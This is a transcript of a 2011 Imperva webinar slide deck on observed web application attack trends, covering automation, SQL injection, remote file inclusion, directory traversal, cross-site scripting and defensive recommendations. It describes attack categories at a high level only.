The State of Application Security: What Hackers Break
•
0 likes•628 views
Companies of all sizes face a universal security threat from today's organized hacking industry. Why? Hackers are decreasing costs and expanding their reach with tools and technologies that allow for automated attacks against Web applications. The hacker’s arsenal includes armies of zombies (i.e. global networks of compromised computers) that access large amounts of personal and corporate data that can be sold on the black market. As part of Imperva's ongoing Hacker Intelligence Initiative, we monitored and categorized individual attacks across the Internet over a period of six months. This webinar will detail the results of this research, which encompasses attacks witnessed via onion router (TOR) traffic as well as attacks targeting 30 different enterprise and government Web applications. The research includes: • Insight into how automation allows hackers to generate 7 attacks per second • Overview of the top vulnerabilities exploited by hackers: directory traversal, cross-site scripting (XSS), SQL injection, and remote file inclusion (RFI) • Detail into which countries generate the most malicious activity • Recommendations, both technical and nontechnical, for security teams and executive
The State of Application Security: What Hackers Break
- 1. The State of Application Security: What Hackers Break Amichai Shulman, CTO, Imperva
- 2. Agenda The current state of Web vulnerabilities Studying hackers + Why? Prioritizing defenses + How? Methodology Analyzing real-life attack traffic + Key findings + Take-aways Technical recommendations 2
- 3. Imperva Overview Imperva’s mission is simple: Protect the data that drives business The leader in a new category: Data Security HQ in Redwood Shores CA; Global Presence + Installed in 50+ Countries 1,200+ direct customers; 25,000+ cloud users + 3 of the top 5 US banks + 3 of the top 10 financial services firms + 3 of the top 5 Telecoms + 2 of the top 5 food & drug stores + 3 of the top 5 specialty retailers + Hundreds of small and medium businesses 3
- 4. Today’s Presenter Amichai Shulman – CTO Imperva Speaker at industry events + RSA, Sybase Techwave, Info Security UK, Black Hat Lecturer on Info Security + Technion - Israel Institute of Technology Former security consultant to banks and financial services firms Leads the Application Defense Center (ADC) + Discovered over 20 commercial application vulnerabilities – Credited by Oracle, MS-SQL, IBM and others Amichai Shulman one of InfoWorld’s “Top 25 CTOs”
- 5. WhiteHat Security Top Ten—2010 Percentage likelihood of a website having at least one vulnerability sorted by class
- 6. The Situation Today # of websites : 357,292,065 (estimated: July 2011) # of x vulnerabilities : 230 1% 821,771,600 vulnerabilities in active circulation
- 7. The Situation Today # of websites : 357,292,065 (estimated: July 2011) # of x vulnerabilities : 230 But which will be exploited? 1% 821,771,600 vulnerabilities in active circulation
- 8. Studying Hackers Focus on actual threats + Focus on what hackers want, helping good guys prioritize + Technical insight into hacker activity + Business trends of hacker activity + Future directions of hacker activity Eliminate uncertainties + Active attack sources + Explicit attack vectors + Spam content Devise new defenses based on real data + Reduce guess work
- 9. Understanding the Threat Landscape: Methodology Analyze hacker tools and activity Tap into hacker forums Record and monitor hacker activity + Categorized attacks across 30 applications + Monitored TOR traffic + Recorded over 10M suspicious requests + 6 months: December 2010-May 2011
- 10. Lesson #1: Automation is Prevailing Attacks are automated + Botnets + Mass SQL Injection attacks + Google dorks
- 11. Lesson #1: Automation is Prevailing Tools and kits exist for everything
- 12. Lesson #1: Automation is Prevailing Apps under automated attack: 25,000 attacks per hour. ≈ 7 per second On Average: 27 attacks per hour ≈ 1 attack per 2 min.
- 13. Lesson #1: Automation is Prevailing Apps under automated attack: 25,000 attacks per hour. ≈ 7 per second Take-away: On Average: 27 attacks per hour Get ready to fight automation ≈ 1 attack per 2 minutes
- 14. Lesson #2: The ―Unfab‖ Four
- 15. Lesson #2A: The ―Unfab‖ Four SQL Injection
- 16. Lesson #2B: The ―Unfab‖ Four Remote File Inclusion
- 17. Lesson #2B: The ―Unfab‖ Four Remote File Inclusion Analyzing the parameters and source of an RFI attack enhances common signature-based attack detection.
- 18. Lesson #2C: The ―Unfab‖ Four Directory Traversal
- 19. Lesson #2C: The ―Unfab‖ Four Directory Traversal
- 20. Lesson #2D: The ―Unfab‖ Four Cross Site Scripting
- 21. Lesson #2D: The ―Unfab‖ Four Cross Site Scripting
- 22. Lesson #2D: The ―Unfab‖ Four Cross Site Scripting – Zooming into Search Engine Poisoning http://HighRankingWebSite+PopularKeywords+XSS … http://HighRankingWebSite+PopularKeywords+XSS
- 23. Lesson #2D: The ―Unfab‖ Four Cross Site Scripting New Search Engine Indexing Cycle
- 24. Lesson #2: The ―Unfab‖ Four Take-away: Protect against these common attacks These may seem obvious common attacks, but RFI and DT do not even appear in OWASP’s top 10 list.
- 25. Directory Traversal Missing from OWASP Top 10? OWASP Rationale: Directory traversal is covered in the OWASP Top Ten 2010 through the more general case, A4, Insecure Direct Object Reference. ―Insecure Direct Object Reference‖ is different than ―Directory Traversal‖ because in the latter access is made to a resource that, to begin with, should not have been available through the application.
- 26. Remote File Inclusion Missing from OWASP Top 10? A3, OWASP Top 10 2007 - Malicious File Execution. Removed in the OWASP Top 10 2010. OWASP Rationale: REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.
- 27. Lesson #3: The U.S. is the Source of Most Attacks We witnessed 29% of attack events originating from 10 sources.
- 28. Lesson #3: The U.S. is the Source of Most Attacks Take-away: Sort traffic based on reputation We witnessed 29% of attack events originating from 10 sources.
- 29. Organizations like these Funded a $27B Security Market in 2010… …All had major breaches in 2011. What’s wrong?
- 30. Threat vs. Spending Market Dislocation The data theft industry is estimated at $1 trillion annually Organized crime is responsible for 85% of data breaches 1 Threats Spending ― Yet well over 90% of the ― In 2010, 76% of all data $27 billion spent on breached was security from servers products was and ‖ on traditional applications1 ‖ security2 1 2011 Data Breach Investigations Report (Verizon RISK Team in conjunction with the US Secret Service & Dutch High Tech Crime Unit) 2 Worldwide Security Products 2011-2014 Forecast (IDC - February 2011)
- 31. Summary Deploy security solutions that deter automated attacks Detect known vulnerability attacks Acquire intelligence on malicious sources and apply it in real time Participate in a security community and share data on attacks
- 32. Summary ―Foreknowledge cannot be gotten from ghosts and spirits, cannot be had by analogy, cannot be found out by calculation. It must be obtained from people, people who know the conditions of the enemy‖ 1 1 Sun Tzu – The art of war
- 33. Imperva: Our Story in 60 Seconds Attack Usage Protection Audit Virtual Rights Patching Management Reputation Access Controls Control
- 34. Webinar Materials Get LinkedIn to Imperva Data Security Direct for… Answers to Post-Webinar Attendee Discussions Questions Webinar Much more… Recording Link
- 36. Thank You - CONFIDENTIAL -